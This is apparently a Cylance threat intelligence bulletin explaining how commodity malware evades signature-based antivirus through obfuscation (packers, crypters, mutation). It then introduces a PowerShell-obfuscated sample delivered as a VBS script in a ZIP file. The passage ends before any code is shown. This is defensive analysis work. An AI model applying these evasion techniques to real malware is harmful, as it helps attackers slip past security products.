You’d think that life would be pretty hard for threat actors these days, given the plethora of security companies out there feeding insatiable, ever-growing blacklists of malware that track millions upon millions of payload fingerprints.
You’d think getting malware past antivirus products would be a Herculean task, requiring the development of new, never before seen custom malware.
If you thought either of those things, you’d be wrong.
Threat actors are increasingly reaching their targets not with exotic, custom payloads but with so-called commodity malware – off-the-shelf programs you can find online, either for free or else for a nominal fee. These are pieces of malware known to all antivirus companies and whose fingerprints (or “signatures”) should be immediately recognizable to them.
So why are threat actors are increasingly using commodity malware? And why are they successful in doing so?
The short answer to both is: obfuscation.
In this Threat Intelligence Bulletin, Cylance explains what obfuscation is and why it works. And we demonstrate how one recently observed obfuscation technique succeeded in bypassing most antivirus products.
Background and Discussion
Cylance has been tracking a trend that sees threat actors turning to common, commodity malware more and more. They’re doing so because it’s cheap, easy to use and, if found, helps to anonymize them. When the fingerprint of a piece of malware is known to all and is within the reach of everyone, the threat actor can hide amongst an impossibly large group of suspects. The payload signature is essentially rendered meaningless.
How it is that commodity malware succeeds despite having a known signature is a paradox explained via the concept of obfuscation, a technique which effectively changes the overall signature, despite delivering the familiar payload.
Obfuscation shifts the attacker’s focus from customizing the final payload to customizing the delivery method. One can assume that this shift is a response to the way in which many antivirus products go about catching malware.
As alluded to above, many antivirus products rely on signatures to identify malware. For many of them, the signature is just a hash or a simple string. In this context, a hash refers to a unique, alphanumeric representation of a piece of malware. Signatures very often are hashes, but they can also be some other brief representation of a unique bit of code inside a piece of malware.
Obfuscation is a term of art that describes a set of techniques used to evade antivirus products that rely heavily on signatures. These techniques change the overall structure of a piece of malware without altering its function. Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.
Common obfuscation techniques include the use of:
- Packers, which compress or “pack” a malware program
- Crypters, which encrypt a malware program (or portions thereof)
- Other obfuscators, which mutate – but do not neuter – the malware program in a variety of ways, thus changing the overall number of bytes in the program
The effect of these obfuscation techniques is to alter the hash and, frequently, the signature of the malware, either by changing the size of the file (e.g. packing) or by hiding its unique strings of code from the antivirus product via encryption.
While some antivirus products search for common obfuscating techniques so that they too may be blacklisted, this practice is not nearly as well established as the blacklisting of malware payload signatures.
In the Technical Analysis below, we dissect an example where the method of obfuscation leveraged features of PowerShell, a tool that comes built in to Microsoft Windows.
Cylance came across the malware file under analysis, which uses a rare PowerShell obfuscation method, while looking into some fresh and poorly detected malicious scripts. The sample appeared to use several techniques described by Daniel Bohannon. The file we analyzed was a ZIP file containing both a PDF document and VBS script:
At the time we found it, the file was only detected by three products:
The VBS script used a rudimentary Base64 encoding to obfuscate the first layer. The contents of this script are displayed below.